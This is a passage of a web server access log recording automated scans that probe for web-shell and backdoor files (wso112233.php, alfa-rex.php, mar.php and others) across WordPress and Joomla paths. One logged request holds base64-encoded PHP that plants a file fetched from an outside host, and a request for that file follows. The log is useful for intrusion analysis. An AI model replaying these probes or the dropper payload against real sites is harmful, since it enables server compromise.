/wp-content/plugins/ioptimization/IOptimize.php?rchk HTTP/1.1" 301 282 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:32 -0400] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 301 266 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:32 -0400] "GET /index.php?3x=3x HTTP/1.1" 301 246 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:33 -0400] "GET /weso.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:33 -0400] "GET /updates.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:33 -0400] "GET /libraries/legacy/updates.php HTTP/1.1" 301 259 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:34 -0400] "GET /web/libraries/legacy/updates.php HTTP/1.1" 301 263 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:34 -0400] "GET /plugins/updates.php HTTP/1.1" 301 250 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:34 -0400] "GET /includes/updates.php HTTP/1.1" 301 251 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:35 -0400] "GET /logs/updates.php HTTP/1.1" 301 247 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:35 -0400] "GET /templates/protostar/updates.php HTTP/1.1" 301 262 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:36 -0400] "GET /libraries/phpmailer/updates.php HTTP/1.1" 301 262 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:36 -0400] "GET /libraries/vendor/updates.php HTTP/1.1" 301 259 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:36 -0400] "GET /wp.-.admin.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:37 -0400] "GET /.well-known/pki-validation/wp.-.admin.php HTTP/1.1" 404 - "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:37 -0400] "GET /templates/beez3/wp.-.admin.php HTTP/1.1" 301 261 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:37 -0400] "GET /libraries/wp.-.admin.php HTTP/1.1" 301 255 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:38 -0400] "GET /.well-known/wso112233.php HTTP/1.1" 301 256 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:38 -0400] "GET /wso112233.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:38 -0400] "GET /.well-knownold/wso112233.php HTTP/1.1" 301 259 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:39 -0400] "GET /.well-known/acme-challenge/wso112233.php HTTP/1.1" 301 271 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 68.183.245.101 - - [12/Aug/2025:05:25:39 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:05:25:39 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 128.199.106.124 - - [12/Aug/2025:05:25:39 -0400] "GET /.well-known/pkivalidation/wso112233.php HTTP/1.1" 301 270 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 144.126.240.247 - - [12/Aug/2025:05:25:39 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 128.199.106.124 - - [12/Aug/2025:05:25:39 -0400] "GET /wp-content/plugins/wso112233.php HTTP/1.1" 301 263 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 86.8.204.43 - - [12/Aug/2025:05:25:40 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 128.199.106.124 - - [12/Aug/2025:05:25:40 -0400] "GET /wp-content/plugins/seoplugins/mar.php HTTP/1.1" 301 268 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:40 -0400] "GET /wp-content/plugins/seoplugins/mar.php HTTP/1.1" 301 268 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:41 -0400] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 301 265 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:41 -0400] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 301 265 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:41 -0400] "GET /images/mar.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:42 -0400] "GET /images/mar.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:42 -0400] "GET /m4r1ju4n4.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:43 -0400] "GET /marijuana.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:43 -0400] "GET /wp-admin/css/colors/coffee/mari.php HTTP/1.1" 301 266 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:44 -0400] "GET /wp-admin/css/colors/coffee/marijuana.php HTTP/1.1" 301 271 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:44 -0400] "GET /wp-admin/css/colors/maro.php HTTP/1.1" 301 259 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:45 -0400] "GET /wp-admin/css/mari.php HTTP/1.1" 301 252 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:45 -0400] "GET /wp-content/plugins/owfsmac/mar.php HTTP/1.1" 301 265 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:46 -0400] "GET /wp-admin/css/maro.php HTTP/1.1" 301 252 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:46 -0400] "GET /wp-admin/includes/mari.php HTTP/1.1" 301 257 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:47 -0400] "GET /wp-admin/maint/mari.php HTTP/1.1" 301 254 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:47 -0400] "GET /wp-admin/mari.php HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:48 -0400] "GET /wp-content/mari.php HTTP/1.1" 301 250 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:49 -0400] "GET /wp-content/plugins/aryabot/mari.php HTTP/1.1" 301 266 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:49 -0400] "GET /wp-content/plugins/aryabot/mar.php HTTP/1.1" 301 265 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:50 -0400] "GET /wp-content/plugins/owfsmac/maro.php HTTP/1.1" 301 266 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:50 -0400] "GET /wp-includes/mari.php HTTP/1.1" 301 251 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:51 -0400] "GET /alfa-rex.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:51 -0400] "GET /admin.php?action=beindex&password=sem2023&aver=PD9waHAgZmlsZV9wdXRfY29udGVudHMoJ292YXRvb2xzLnBocCcsIGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwczovL3VjZG8uZ3JvdXAvd3AtYWRtaW4vdS50eHQnKSkgPyBwcmludCAnc3VjY2Vzc2Z1bGx5ICcgOiBwcmludCAnRXJyb3InOyA/Pg==&fileplus=PD9waHAgZmlsZV9wdXRfY29udGVudHMoJ292YXRvb2xzLnBocCcsIGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwczovL3VjZG8uZ3JvdXAvd3AtYWRtaW4vdS50eHQnKSkgPyBwcmludCAnc3VjY2Vzc2Z1bGx5ICcgOiBwcmludCAnRXJyb3InOyA/Pg==&checkstring=PD9waHAgZmlsZV9wdXRfY29udGVudHMoJ292YXRvb2xzLnBocCcsIGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwczovL3VjZG8uZ3JvdXAvd3AtYWRtaW4vdS50eHQnKSkgPyBwcmludCAnc3VjY2Vzc2Z1bGx5ICcgOiBwcmludCAnRXJyb3InOyA/Pg== HTTP/1.1" 301 881 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:52 -0400] "GET /ovatools.php HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:25:52 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 301 260 "-" "python-requests/2.32.4" 209.38.125.40 - - [12/Aug/2025:05:28:57 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.102.237.41 - - [12/Aug/2025:05:28:57 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.222 - - [12/Aug/2025:05:28:57 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:05:28:58 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:05:40:57 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:05:40:57 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:05:40:57 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:05:40:57 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 152.42.157.60 - - [12/Aug/2025:05:41:48 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:05:41:48 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:05:41:48 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:05:41:49 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.102.237.41 - - [12/Aug/2025:05:42:36 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:05:42:36 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:05:42:36 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.222 - - [12/Aug/2025:05:42:36 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 43.157.180.116 - - [12/Aug/2025:05:43:53 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 146.190.11.185 - - [12/Aug/2025:05:44:12 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:05:44:12 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:05:44:12 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:05:44:13 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:05:52:17 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:05:52:17 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:05:52:17 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:05:52:17 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 68.183.245.101 - - [12/Aug/2025:05:54:27 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:05:54:27 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:05:54:27 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:05:54:28 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:05:57:29 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.102.237.41 - - [12/Aug/2025:05:57:29 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:05:57:29 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.222 - - [12/Aug/2025:05:57:29 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:06:11:01 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:06:11:01 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:06:11:01 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:06:11:01 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.102.237.41 - - [12/Aug/2025:06:11:43 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:06:11:43 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:06:11:43 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) 